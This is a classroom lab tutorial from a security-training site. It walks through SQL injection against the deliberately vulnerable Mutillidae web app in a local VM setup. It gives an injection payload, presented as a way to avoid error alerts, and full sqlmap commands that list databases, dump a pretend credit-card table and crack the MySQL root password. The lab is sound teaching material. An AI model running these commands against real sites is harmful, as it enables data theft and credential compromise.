ComputerSecurityStudent (CSS)

[Login]

[Join Now]

|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page

|Views: 49761

(Mutillidae: Lesson 12)

{ SQL Injection with sqlmap, tamper data & burpsuite }

Section 0. Background Information

What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
What is a SQL Injection?
- SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
- This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
- The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
What is sqlmap?
- sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
What is tamper data?
- Tamper Data is a Firefox Extension which gives you the power to view, record and modify outgoing HTTP/HTTPS requests (headers and post parameters).
Pre-Requisite Lab
1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
  - Note: Remote database access has been turned on to provide an additional vulnerability.
2. BackTrack: Lesson 1: Installing BackTrack 5 R1
  - Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
3. BackTrack 5R1: Lesson 11: How to Enable Tamper Data
  - Note: Tamper Data comes with Firefox on BackTrack 5 R1, but it is not enabled.
4. Mutillidae: Lesson 8: SQL Injection Union Exploit #1
  - Note: This lab contains a detailed foundation surrounding the union exploit.
Lab Notes
- In this lab we will do the following:
  1. Due to a purposeful bug in the index.php code, we will tamper data to positive test for an SQL vulnerability without generating an error.
  2. We will capture a HTTP POST Request from burpsuite.
  3. We will use sqlmap to view pretend credit_card contents.
  4. We will use sqlmap to view username and password information.

Legal Disclaimer
- As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
- In addition, this is a teaching website that does not condone malicious behavior of any kind.
- Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
- © 2013 No content replication of any kind is allowed without express written permission.

Section 1: Configure Fedora14 Virtual Machine Settings

Start VMware Player
- Instructions
  1. For Windows 7
    1. Click Start Button
    2. Search for "vmware player"
    3. Click VMware Player
  2. For Windows XP
    - Starts --> Programs --> VMware Player
Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
  1. Highlight Fedora14 - Mutillidae
  2. Click Edit virtual machine settings
Edit Network Adapter

Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click the OK Button

Section 2: Login to Fedora14 - Mutillidae

Start Fedora14 VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select Fedora14 - Mutillidae
  3. Play virtual machine
Login to Fedora14 - Mutillidae
- Instructions:
  1. Login: student
  2. Password: <whatever you set it to>.

Section 3: Open Console Terminal and Retrieve IP Address

Start a Terminal Console
- Instructions:
  1. Applications --> Terminal
Switch user to root
- Instructions:
  1. su - root
  2. <Whatever you set the root password to>
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes (FYI):
  - As indicated below, my IP address is 192.168.1.111.
  - Please record your IP address.

Section 4: Configure BackTrack Virtual Machine Settings

Start VMware Player
- Instructions
  1. For Windows 7
    1. Click Start Button
    2. Search for "vmware player"
    3. Click VMware Player
  2. For Windows XP
    - Starts --> Programs --> VMware Player
Edit the BackTrack5R1 VM
- Instructions:
  1. Select BackTrack5R1 VM
  2. Click Edit virtual machine settings
Edit Virtual Machine Settings
- Instructions:
  1. Click on Network Adapter
  2. Click on the Bridged Radio button
  3. Click on the OK Button

Section 5: Play and Login to BackTrack

Play the BackTrack5R1 VM
- Instructions:
  1. Click on the BackTrack5R1 VM
  2. Click on Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx

Section 6: Open Console Terminal and Retrieve IP Address

On BackTrack, Start up a terminal window
- Instructions:
  1. Click on the Terminal Window
Obtain the IP Address
- Instructions:
  1. ifconfig -a
- Note(FYI):
  - My IP address 192.168.1.109.
  - In your case, it will probably be different.
  - This is the machine that will be use to attack the victim machine (Metasploitable).

Section 7: Navigate to "View Someones Blog"

On BackTrack, Open Firefox
- Instructions:
  1. Click on the Firefox Icon
- Notes (FYI):
  - If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
Open Mutillidae
- Notes (FYI):
  - Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
  1. http://192.168.1.111/mutillidae
Go to View Someones Blog
- Instructions:
  1. OWASP Top 10 --> A1 - SQL Injection --> SQLMAP Practice --> View Someones Blog

Section 8: Positive SQL Injection Test

Activate Tamper Data
- Instructions:
  1. Tools --> Tamper Data
Start the Tamper
- Instructions:
  1. Click on Start Tamper
View Blog Entries
- Instructions:
  1. Select "admin" from the drop down menu
  2. Click on the View Blog Entries
Tamper with request?
- Instructions:
  1. Click on the Tamper Button
Modify Post Parameter Values
- Instructions:
  1. Replace admin with '' --
    - Where there are two single quotes (').
    - Remember to put a space after the last hyphen (-).
  2. Click the OK Button
- Note(FYI):
  1. The goal of submitting '' -- to the webpage form is to produce empty results without triggering an error.
  2. Some web administrators have automated alerts that are triggered from application and database log errors.
  3. So in this case, we now know a SQL injection is possible, without creating an error.
Close Tamper Data
- Instructions:
  1. Click the X to close Tamper Data
- Note(FYI):
  1. We are closing Tamper Data, because we no longer need to tamper with any HTTP POST REQUESTS.
  2. Continue to Next Step.
Viewing the Results
- Note(FYI):
  1. Notice 0 records where returned.
  2. This test was positive, because it did not trigger any errors, but it did produce the column headers if results were to be returned.

Section 12: Configure Firefox Proxy Settings

View Preferences
- Instructions:
  1. Edit --> Preferences
Advanced Settings...
- Instructions:
  1. Click on the Advanced Icon
  2. Click on the Network Tab
  3. Click on the Setting... button
Connection Settings
- Instructions:
  1. Click on Manual proxy configurations
  2. Type "127.0.0.1" in the HTTP Proxy Text Box
  3. Type "8080" in the Port Text Box
  4. Check Use the proxy server for all protocols
  5. Click OK
  6. Click Close

Section 13: Configure Burp Suite

Start Burp Suite
- Instructions:
  1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Assessment ---> Web Application Proxies --> burpsuite
JRE Message
- Instructions:
  1. Click OK
Configure proxy
- Instructions:
  1. Click on the proxy tab
  2. Click on the options tab
  3. Verify the port is set to 8080

Section 12: Capture Post Parameters with Burpsuite

View Blog Entries
- Instructions:
  1. Select "admin" from the drop down menu
  2. Click on the View Blog Entries
Copy Post Parameter
- Instructions:
  1. Highlight all the text.
  2. Right Click on the Highlighted text.
    - This will create menu list.
  3. Select Copy.
Open gedit
- Notes (FYI):
  - gedit is a UTF-8 compatible text editor for the GNOME desktop environment, Mac OS X and Microsoft Windows.
- Instructions:
  1. gedit /pentest/database/sqlmap/burp.txt &
Save File
- Notes (FYI):
  - The Edit-->Paste feature does not work from burpsuite; therefore, you will press the <Ctrl> and v keys to paste.
- Instructions:
  1. Press the <Ctrl> and v keys to paste.
  2. Click the Save button

Section 13: Using sqlmap against Mutillidae

View Databases with sqlmap
- Instructions:
  1. cd /pentest/database/sqlmap
  2. grep "Referer" burp.txt | awk '{print $2}'
  3. grep "author" burp.txt
  4. grep "Cookie" burp.txt | sed 's/Cookie: //'
  5. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" --dbs
    - Replace 192.168.1.111. with Mutillidae's IP address obtained from (Section 3, Step 3).
    - Replace the following cookie string showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24 with the cookie obtain from the Step 4 above.
View Database Results
- Instructions:
  1. Do you want to keep testing the others? [y/N] N
  2. Notice the databases sqlmap returns.
View nowasp database tables
- Instructions:
  1. Press the UP ARROW to display the previous command
  2. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" -D nowasp --tables
- Notes (FYI):
  1. -D nowasp --tables, display the nowasp database tables.
View table results with sqlmap
- Note(FYI):
  1. Notice the 11 nowasp tables
  2. Notice there is a credit card table.
Retrieve credit_cards table contents
- Instructions:
  1. Press the UP ARROW to display the previous command
  2. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" -D nowasp -T credit_cards --dump
- Note(FYI):
  1. -D nowasp -T credit_cards --dump, display the credit_cards table content.
Review credit_cards table results
- Instructions:
  1. Do you want to use dictionary attack ... [Y/n/q] n
  2. Notice the pretend credit card numbers.

Section 14: Using sqlmap -- Load HTTP request from a file

View Databases with sqlmap
- Instructions:
  1. ./sqlmap.py -r burp.txt --dbs
- Note(FYI):
  1. -r, This option is very kool. It allows you to use the burpsuite file we saved in (Section 12, Step 4), instead of using the -u, --data, and --cookie options.
  2. --dbs, This options displays all the databases.
  3. I guess I could of showed you this option earlier, but good things come to those who wait.
View Databases results
- Note(FYI):
  1. Notice that all the databases are displayed similar to (Section 13, Step 2).
  2. The mysql database contains important internal tables including usernames and passwords.
View tables with sqlmap
- Instructions:
  1. ./sqlmap.py -r burp.txt -D mysql --tables
- Note(FYI):
  1. -D mysql --tables, This option displays the mysql database tables.
View tables results
- Note(FYI):
  1. Notice all the tables for the mysql database are displayed.
  2. The user table contains all the usernames and passwords for each database.
View user table contents with sqlmap
- Instructions:
  1. ./sqlmap.py -r burp.txt -D mysql -T user --dump
- Note(FYI):
  1. -D mysql -T user --dump, This option displays the content of the user table in the mysql database.
View user table password
- Instructions:
  1. Do you want to sue dictionary attack ... [Y/n/q] Y
  2. What's the dictionary location? <Press Enter>
  3. Do you want to use common password suffices? [y/N] N
  4. Notice the user is 'root' and the password is 'samurai'

Section 15: Proof of Lab

Proof of Lab, (On a BackTrack Terminal)
- Instructions:
  1. find /pentest/database/sqlmap/output/*/dump/mysql -name "*.csv" | xargs grep samurai
    - Search the (/pentest/database/sqlmap/output/*/dump/mysql) path
    - Search for files with a (*.csv) extension.
    - Search the .csv files for the string samurai
  2. date
  3. echo "Your Name"
    - Replace the string "Your Name" with your actual name.
    - e.g., echo "John Gray"
- Proof of Lab Instructions
  1. Press both the <Ctrl> and <Alt> keys at the same time.
  2. Do a <PrtScn>
  3. Paste into a word document
  4. Upload to Moodle